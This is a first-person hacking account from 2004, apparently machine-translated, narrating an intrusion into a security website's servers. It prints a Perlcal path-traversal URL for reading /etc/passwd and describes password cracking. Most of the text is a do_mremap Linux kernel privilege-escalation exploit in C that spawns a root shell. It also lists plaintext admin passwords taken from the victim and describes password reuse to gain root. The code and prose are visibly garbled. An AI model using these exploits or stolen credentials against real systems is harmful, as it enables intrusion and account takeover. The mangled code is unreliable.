Author: sunwear
Mail: shellcoder@163.com
Time: 2004, 5, 7
Preface:
This article is relatively long, I hope you have patient read. I invaded the server for a famous security site. The process is very complicated after a week of struggle. I hope that you can help. Please be patient after reading :). It is also related to social engineering.
text
Do not talk nonsense. start
C: / documents and settings / administrator> ping www.xxx.com
Pinging www.xxx.com [192.168.0.252] with 32 bytes of data:
Reply from 192.168.0.252: bytes = 32 TIME <10MS TTL = 128
Reply from 192.168.0.252: bytes = 32 TIME <10MS TTL = 128
Reply from 192.168.0.252: bytes = 32 TIME <10MS TTL = 128
Reply from 192.168.0.252: bytes = 32 TIME <10MS TTL = 128
Ping statistics for 192.168.0.252:
Packets: Sent = 4, Received = 4, LOST = 0 (0% LOSS),
Approximate Round Trip Times in Milli-Seconds:
Minimum = 0ms, maximum = 0ms, Average = 0ms
IP in the article is not announced here. IP
Look at the TTL return information judgment system should not really change this now
Scan him first, let's take a look.
The result opened only 21 22 80
It seems that the success rate is not to play FTP and there is no information in the mouth 80.
It seems that he found that there is bbs.xxx.com and news.xxx.com and the IP is not the same, it seems that it will penetrate.
First, go to bbs.xxx.com to see the program seems to be the same as the Green League. It seems that there is no vulnerability to put it on the side.
Take a look at the port of the server
Opened 21 22 80 Nothing
Take a look at News.xxx.com
After scanning judgment server should be NT / 2000
21 80 389 1002 3389
There is basically no vulnerability 21, if this is the password, this is IIS, there is no vulnerability 389, there is no use of 3389, it is impossible to have input method.
200 Server
The program for news.xxx.com is an Asp to think of SQL injection. But thoroughly checking all the filtered.
A bit depressed
Jswz.xxx.com
It is also a paging but this is also very unexpectedly used, the CGI system is Linux.
21 22 80
I have a vulnerability
Cal_make.pl Seeing the name is a bit familiar to see it, but I have never remembered it.
Several stations in foreign countries finally discovered ~~~
Name: Perlcal
About: Cal_make.pl of the Perlcal Script May Allow Remote Users (Website Visitors) To View Any File ON A Webserver
(Dependingon The User The Webserver is Running ON).
Explloit:
http://www.vulnerable.com/cgi-bin/cal_make.pl?/
P0 = .. / .. / .. / .. / .. / .. / .. / .. /. / etc / passwd% 00
By: stan (stan@whizkunde.org)
Oh, thank Hack.co.za
Enter the browser address bar
http://www.xxx.edu/cgi-bin/perlcal/cal_make.pl?p0=../../../../../../../../../../../../../../../. ./../..../etc/passwd� Multi-user information But this is a chandum that has passed Passwd's good opportunity to give up!
I want to run these users ~~~
Refining username hopes to have a weak mouth
Refining the refining process, please refer to some information.
A total of more than 20 users ran out 2 haha. . ~~
Log in to SSH ~
Permission seems very low
Try with the second one
Oh, yes
Look at the upgrade permission ~~
After a toss 100%, it is determined that RH73 kernel Linux kernel 2.4
Use Do_BRK!
#include
#include
#include
Char hellc0de [] =
"/ x69 / x6E / x65 / x74 / x75 / x69 / x64 / x28 / x29 / x20 / x7b / x20 / x72 / x65"
"/ x74 / x20 / x30 / x3b / x20 / x7d / x0a / x69 / x6e / x74 / x20 / x67 / x65 / x74"
"/ x65 / x28 / x29 / x20 / x7b / x20 / x72 / x65 / x74 / x75 / x72 / x6e / x20 / x30"
"/ x3b / x20 / x6e / x74 / x20 / x67 / x65 / x74 / x67 / x69 / x64 / x28 / x29 / x20"
"/ x7b / x20 / x72 / x72 / x6e / x20 / x30 / x3b / x20 / x7d / x0a / x69 / x6e / x74"
"/ x20 / x67 / x67 / x69 / x64 / x28 / x29 / x20 / x7b / x20 / x72 / x65 / x74 / x75"
"/ x72 / x6e / x20 / x30 / x3b / x20 / x7d / x0a / x0 / bin / sh"
int main ()
{
File * fp;
CHAR * OFFSET;
FP = fopen ("/ tmp / own.c", "w");
FPRINTF (FP, "% s", HELLC0DE;
Fclose (fp);
System ("gcc -shared -o /tmp/ow.so /tmp/own.c;rm /tmp/own.c");
System ("LD_PRELOAD = / TMP / OWN.SO / BIN / SH");
Return 0;
}
Depressed
Do something else
Try DO_MREMAP VMA Local Permissions Lifting Vulnerability
The MREMAP (2) system call in the Linux kernel is not checked for the function return value, and the local attacker can use this vulnerability to obtain root user privileges.
The MREMAP system call is used to change the boundary address of the Mapping Segment (VMAS). MREMAP () system call provides the size of the existing virtual memory area. The moving part of the VMA area is moving part of the virtual memory to the new area requires a new VMA descriptor, which is to copy the following page table entry description by the VMA from the old area to the new location in the process page table. .
To complete this task DO_MREMAP code, you need to call the DO_MUNMAP () internal kernel function to clear any existing memory mappings in the new location, that is, deleting old virtual memory mappings. Unfortunately, the code does not check the return value of the Do_Munmap () function. If the maximum number of VMA descriptors has exceeded, then the function call may fail.
:) :) :)
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define str (s) #S
#define xstr (s) STR (s)
// this is for standard kernels with 3/1 split
#define starddr 0x40000000
#define pgd_size (Page_Size * 1024)
#define victim (StartAddr PGD_SIZE)
#define mmap_base (StartAddr 3 * PGD_SIZE)
#define DSignal Sigchld
#defineclonefl (DSIGNAL | Clone_vfork | Clone_VM)
#define mremap_maymove ((1 ul) << 0)
#define mremap_fixed ((1 ul) << 1)
#DEFINE __NR_SYS_MREMAP __NR_MREMAP
// How much ld.so pages? this is the .text section length (Like from cat
// / proc / self / maps in Pages
#define linkerpages 0x14
// Suid Victim
Static char * suid = "/ bin / ping";
// shell to start
Static char * launch = "/ bin / bash";
_syscall5 (Ulong, Sys_mremap, Ulong, A, Ulong, B, Ulong, C, Ulong, D,
Ulong, e);
Unsigned long sys_mremap (unsigned long addr, unsigned long old_len,
Unsigned long new_len, unsigned long flags,
Unsigned long new_addr;
Static Volatile Unsigned Base, * T, CNT, OLD_ESP, PROT, VICTIM = 0;
Static INT I, PID = 0;
Static Char * ENV [2], * Argv [2];
Static Ulong Ret;
// code to Appear Inside the suid image
Static void suid_code (void)
{
__ASM __ (
"Call Callme / N"
// setresuid (0, 0, 0), setresgid (0, 0, 0)
"JUMPME: XORL% EBX,% EBX / N"
"xorl% ECX,% ECX / N"
"xorl% EDX,% EDX / N"
"xorl% EAX,% EAX / N"
"MOV $" XSTR (__ nr_setresuid) ",% Al / N"
"INT $ 0x80 / N"
"MOV $" XSTR (__ nr_setresgid) ",% Al / N" "INT $ 0x80 / N"
// Execve (launch)
"POPL% EBX / N"
"Andl $ 0xfffff000,% EBX / N"
"xorl% EAX,% EAX / N"
"pushl% EAX / N"
"MOVL% ESP,% EDX / N"
"pushl% EBX / N"
"MOVL% ESP,% ECX / N"
"MOV $" XSTR (__ nr_execve) ",% Al / N"
"INT $ 0x80 / N"
// EXIT
"xorl% EAX,% EAX / N"
"MOV $" XSTR (__ nr_exit) ",% Al / N"
"INT $ 0x80 / N"
"Callme: JMP JUMPME / N"
);
}
Static int suid_code_end (INT V)
{
RETURN V 1;
}
Static inline void get_esp (void)
{
__ASM __ (
"MOVL %% ESP, %% EAX / N"
"Andl $ 0xfffff000, %% EAX / N"
"MOVL %% EAX,% 0 / N"
:: "M" (OLD_ESP)
);
}
Static Inline Void Cloneme (Void)
{
__ASM __ (
"pusha / n"
"Movl $ (" XSTR (Clonefl) "), %% EBX / N"
"MOVL %% ESP, %% ECX / N"
"MOVL $" XSTR (__ nr_clone) ", %% EAX / N"
"INT $ 0x80 / N"
"MOVL %% EAX,% 0 / N"
"POPA / N"
:: "M" (PID)
);
}
Static inline void my_execve (void)
{
__ASM __ (
"MOVL% 1, %% EBX / N"
"MOVL% 2, %% ECX / N"
"MOVL% 3, %% EDX / N"
"MOVL $" XSTR (__ nr_execve) ", %% EAX / N"
"INT $ 0x80 / N"
: "= a" (RET)
: "M" (SUID), "M" (Argv), "M" (ENV)
);
}
Static Inline Void PTE_Populate (unsigned addr)
{
Unsigned R;
Char * PTR;
MEMSET ((void *) addr, 0x90, page_size;
R = ((unsigned) ((unsigned) ((unsigned) suid_code;
PTR = (Void *) (AddR Page_Size);
PTR - = R 1;
Memcpy (PTR, Suid_code, R);
Memcpy ((void *) Addr, launch, strlen (launch) 1);
}
// Hit VMA Limit & PortesTatic Void Exhaust (Void)
{
// mmap PTE Donor
T = MMAP ((void *) Victim, Page_Size * (Linkerpages 3), Prot_read | Prot_Write,
Map_private | map_anonymous | map_fixed, 0, 0);
IF (map_failed == T)
Goto failed;
// Prepare Shell Code Pages
For (i = 2; i PTE_POPULATE (Victim Page_SIZE * i); I = MPROTECT ((void *) Victim, Page_Size * (Linkerpages 3), prot_read); IF (i) Goto failed; // Lock unmap Base = mmap_base; CNT = 0; Prot = prot_read; Printf ("/ n"); fflush (stdout); For (;;) { T = mmap ((void *) base, Page_Size, Prot, Map_private | map_anonymous | map_fixed, 0, 0); IF (map_failed == t) { IF (eNomem == errno) Break; Else Goto failed; } IF (! (cnt% 512) || CNT> 65520) Printf ("/ r mmap #% d 0x% .8x - 0x% .8LX", CNT, BASE, Base Page_Size; fflush (stdout); Base = Page_Size; Prot ^ = prot_exec; CNT ; } //move ptes & populate page Table Cache RET = SYS_MREMAP (Victim Page_Size, Linkerpages * Page_size, Page_Size, MREMAP_FIXED | MREMAP_MAYMOVE, VICTIM); IF (-1 == RET) Goto failed; Munmap (void *) mmap_base, old_esp-mmap_base); T = mmap ((void *) (OLD_ESP-PGD_SIZE-PAGE_SIZE), Page_SIZE, Prot_read | prot_write, map_private | map_anonymous | map_fixed, 0, 0); IF (map_failed == T) Goto failed; * t = * ((unsigned *) OLD_ESP); Munmap ((void *) Victim-Page_Size, OLD_ESP- (Victim-Page_SIZE)); Printf ("/ N [ ] Success / N / N"); fflush (stdout); Return; Failed: Printf ("/ n [-] failed / n"); fflush (stdout); _exit (0); } Static Inline Void Check_kver (Void) { STATIC STRUCT UTSNAME UN; INT A = 0, B = 0, C = 0, V = 0, E = 0, N; Uname (& UN); N = SSCANF (un.velease, "% D.% d.% d", & a, & b, & c); IF (n! = 3 || a! = 2) { Printf ("/ n [-] invalid kernel version string / n"); _exit (0); } IF (b == 2) { IF (c <= 25) v = 1; } Else IF (b == 3) { IF (c <= 99) v = 1; } ELSE IF (b == 4) { IF (c> 18 && c <= 24) v = 1, e = 1; ELSE IF (c> 24) v = 0, E = 0; Else v = 1, E = 0; } Else IF (b == 5 && c <= 75) v = 1, e = 1; Else IF (b == 6 && c <= 2) v = 1, e = 1; Printf ("/ n [ ] kernel% s Vulnerable:% s exploitable% s", Un.velease, V? "YES": "no", e? "yes": "no"); Fflush (stdout); IF (V && E) Return; _exit (0); } INT Main (int AC, char ** av) { // prepare Check_kver (); MEMSET (ENV, 0, SIZEOF (ENV)); MEMSET (Argv, 0, SizeOf (Argv)); IF (AC> 1) Suid = AV [1]; IF (AC> 2) Launch = AV [2]; Argv [0] = SUID; Get_ESP (); // MMap & Clone & Execve Exmast (); Cloneme (); IF (! PID) { MY_EXECVE (); } else { Waitpid (PID, 0, 0); } Return 0; } Jer ~~~~ Successful .................................................. I have finished some things and then see what I can use. Oh Mailuserinfo, see what is written here ~ Admin E04i9zs8 # $% Kelzr zjjjwoai22 @ Sunzsdk 2Z2Z2Z2Z2Z2Z2Z2Z Wollf WoainiliaoyNX Remember that there are these administrators on the main station ~ Looking for the landing place Www.xxx.com/login.php Your IP is not allowed to log in fainted Try with SSH landing 192.168.0.252 Sure enough, you can log in, the user name is Kelzr password is WoainiliaoyNx Oh, I tried it 2 minutes. After logging in, I found that the authority is not ROOT crying. I have tried three upgraded permissions. Depressed ing Depressed found a login record is this machine login to another machine record password is clear text Dependent 192.168.0.2 User name admin Password Mozjkelzlf152 @ is FTP login It seems that he is estimated to write down. I suddenly took an idea :) Disconnect to reinterpret the host root mozjkelzlf152 @ haha came in If you have permission, please do it. I used to penetrate a lot of stations, all such administrators' passwords are generally the same as the password of a unit! Hey ~ Everyone is best to develop a habit to avoid password repeat.
